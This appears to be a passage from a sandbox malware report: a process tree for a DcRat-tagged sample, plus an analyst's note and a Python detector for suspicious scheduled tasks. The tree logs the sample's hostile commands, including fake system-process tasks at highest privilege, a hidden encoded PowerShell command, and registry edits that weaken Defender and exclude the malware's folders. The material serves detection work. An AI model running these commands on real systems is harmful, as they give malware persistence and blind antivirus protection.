C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\dpnathlp\winlogon.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "5RLR8rS_aMkp6xiTBY96V6aV" /sc ONLOGON /tr "'C:\Users\Admin\Documents\These\5RLR8rS_aMkp6xiTBY96V6aV.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 1368 -ip 13681⤵
-
C:\Windows\SysWOW64\uefifces\ezokegez.exeC:\Windows\SysWOW64\uefifces\ezokegez.exe /d"C:\Users\Admin\Documents\5RLR8rS_aMkp6xiTBY96V6aV.exe"1⤵
-
C:\Windows\SysWOW64\svchost.exesvchost.exe2⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1420 -s 5162⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 4252 -ip 42521⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1420 -ip 14201⤵
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files\Common Files\microsoft shared\ClickToRun\C2R64\OfficeClickToRun.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\docprop\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Documents and Settings\WaaSMedicAgent.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Windows\System32\unimdmat\RuntimeBroker.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\WMADMOE\lsass.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "ETuSLYkVQqOjTT_usPKsVG0_" /sc ONLOGON /tr "'C:\Users\Admin\Documents\Mh9GBYaC5IGIHnRPtOgGO9qd\ETuSLYkVQqOjTT_usPKsVG0_.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "arnatic_7" /sc ONLOGON /tr "'C:\Documents and Settings\arnatic_7.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "dwm" /sc ONLOGON /tr "'C:\Windows\System32\Microsoft.Uev.Office2013CustomActions\dwm.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "services" /sc ONLOGON /tr "'C:\odt\services.exe'" /rl HIGHEST /f1⤵
- DcRat
- Process spawned unexpected child process
- Creates scheduled task(s)
-
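The top-level schtasks.exe entries above register ONLOGON tasks with /rl HIGHEST whose actions borrow the names of Windows system processes (smss, dllhost, dwm, fontdrvhost, winlogon, lsass, services, RuntimeBroker, WaaSMedicAgent) but point into directories where those binaries do not live (C:\PerfLogs, C:\Windows\SysWOW64\sv-SE, C:\Windows\System32\runonce, C:\odt and so on), next to tasks that run dropped executables from the user profile or, as in the `booXbIzkEgfNdKvxAC` task earlier in the tree, as SYSTEM from %TEMP%. The Python below is an added detection example for this report, not code from the sample or the sandbox: it parses schtasks /create command lines (from a process tree, Sysmon event 1 or 4688) and flags name-versus-location mismatches and high-privilege tasks whose action lives in a user-writable path. The sample lines are copied from the tree; the expected-location table is an assumption about a stock Windows 10 layout, and the rule names are mine.

```python
"""Flag scheduled-task persistence that masquerades as Windows system processes.

Added detection example for this report (not the sample's or the sandbox's code).
Sample lines are copied from the process tree; KNOWN_SYSTEM_BINARIES assumes a
stock Windows 10 layout and USER_WRITABLE lists roots a standard user can write to.
"""
import ntpath
import re

# Constructed input: schtasks command lines copied from the process tree.
SAMPLE_CMDLINES = [
    r'''schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\PerfLogs\smss.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Windows\SysWOW64\sv-SE\dllhost.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "lsass" /sc ONLOGON /tr "'C:\Windows\System32\WMADMOE\lsass.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "5RLR8rS_aMkp6xiTBY96V6aV" /sc ONLOGON /tr "'C:\Users\Admin\Documents\These\5RLR8rS_aMkp6xiTBY96V6aV.exe'" /rl HIGHEST /f''',
    r'''schtasks /CREATE /TN "booXbIzkEgfNdKvxAC" /SC once /ST 01:00:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\FanYkxe.exe\" j6 /site_id 525403 /S" /V1 /F''',
    r'''schtasks /run /I /tn "gneIVspRo"''',
]

# Assumed stock locations (lowercase, no trailing backslash) of the process names abused here.
KNOWN_SYSTEM_BINARIES = {
    "smss.exe": {r"c:\windows\system32"},
    "dllhost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
    "dwm.exe": {r"c:\windows\system32"},
    "fontdrvhost.exe": {r"c:\windows\system32"},
    "winlogon.exe": {r"c:\windows\system32"},
    "lsass.exe": {r"c:\windows\system32"},
    "services.exe": {r"c:\windows\system32"},
    "runtimebroker.exe": {r"c:\windows\system32"},
    "waasmedicagent.exe": {r"c:\windows\system32"},
    "sihost.exe": {r"c:\windows\system32"},
    "svchost.exe": {r"c:\windows\system32", r"c:\windows\syswow64"},
}
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\", "c:\\documents and settings\\")
# quoted argument (with \" escapes, as schtasks logs them) or bare word
_TOKEN = re.compile(r'"(?:\\.|[^"\\])*"|\S+')


def parse_schtasks_create(cmdline: str):
    """Return the /tn /tr /sc /st /ru /rl arguments of a schtasks /create line, else None."""
    toks = [t.strip('"') for t in _TOKEN.findall(cmdline)]
    low = [t.lower() for t in toks]
    if "/create" not in low:
        return None
    rec = {}
    for i, t in enumerate(low):
        if t in ("/tn", "/tr", "/sc", "/st", "/ru", "/rl") and i + 1 < len(toks):
            rec[t[1:]] = toks[i + 1]
    return rec


def action_executable(tr: str) -> str:
    """First program in a /tr action; handles the "'path'" and "\"path\" args" wrappings seen above."""
    tr = tr.replace('\\"', '"').strip().strip("'")
    if tr.startswith('"'):
        return tr[1:].split('"', 1)[0]
    parts = tr.split()
    return parts[0] if parts else ""


def assess(rec) -> list:
    """(rule, detail) reasons a task creation looks like persistence; empty if none fire."""
    directory, name = ntpath.split(action_executable(rec.get("tr", "")).lower())
    reasons = []
    expected = KNOWN_SYSTEM_BINARIES.get(name)
    if expected and directory not in expected:
        reasons.append(("masquerade", name))  # system process name in the wrong directory
    in_user_path = directory.startswith(USER_WRITABLE)
    if rec.get("rl", "").upper() == "HIGHEST" and in_user_path:
        reasons.append(("highest_from_user_path", directory))
    if rec.get("ru", "").upper() == "SYSTEM" and in_user_path:
        reasons.append(("system_from_user_path", directory))
    return reasons


def triage(cmdlines) -> list:
    """[(task name, reasons)] for every /create line that trips a rule."""
    out = []
    for line in cmdlines:
        rec = parse_schtasks_create(line)
        if rec:
            reasons = assess(rec)
            if reasons:
                out.append((rec.get("tn", ""), reasons))
    return out


if __name__ == "__main__":
    for task, reasons in triage(SAMPLE_CMDLINES):
        print(task, reasons)
```

The masquerade rule is the one that catches most of this batch: the action paths sit under C:\Windows, so a rule that only looks for binaries outside Program Files or Windows would miss smss.exe in C:\PerfLogs or lsass.exe under System32\WMADMOE. The two location rules cover the dropped executables that keep their random names; the task `booXbIzkEgfNdKvxAC` is flagged because it runs as SYSTEM from a directory the installer created under the user's Temp. The `schtasks /run` line is ignored because it creates nothing.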
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 1368 -ip 13681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5044 -ip 50441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 5004 -ip 50041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1368 -ip 13681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 392 -p 4900 -ip 49001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5044 -ip 50441⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 5824 -ip 58241⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4900 -ip 49001⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 1368 -ip 13681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 5004 -ip 50041⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1332 -ip 13321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 1368 -ip 13681⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 1332 -ip 13321⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4148 -ip 41481⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 652 -p 5884 -ip 58841⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵
-
C:\Users\Admin\AppData\Local\Temp\AF15.exeC:\Users\Admin\AppData\Local\Temp\AF15.exe1⤵
-
C:\Users\Admin\AppData\Local\Temp\AFC2.exeC:\Users\Admin\AppData\Local\Temp\AFC2.exe1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\AppData\Local\Temp\AFC2.exeC:\Users\Admin\AppData\Local\Temp\AFC2.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon1⤵
-
C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\FanYkxe.exeC:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\FanYkxe.exe j6 /site_id 525403 /S1⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\QMuGxDzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YhmfbgEUeceU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\iTBLcazoBHNRC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\rYNYBiCjmUUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\hnkumIqTRwUxQLVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\RHdUtmclRPrQNqWD\" /t REG_DWORD /d 0 /reg:64;"2⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\QMuGxDzxU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe (tree depth 3)
  command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YhmfbgEUeceU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe (tree depth 3)
  command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe (tree depth 3)
  command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\cKaYGDvIdbsNnMDfsrR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe (tree depth 3)
  command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe (tree depth 3)
  command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\iTBLcazoBHNRC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe (tree depth 3)
  command line: "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rYNYBiCjmUUn" /t REG_DWORD /d 0 /reg:32

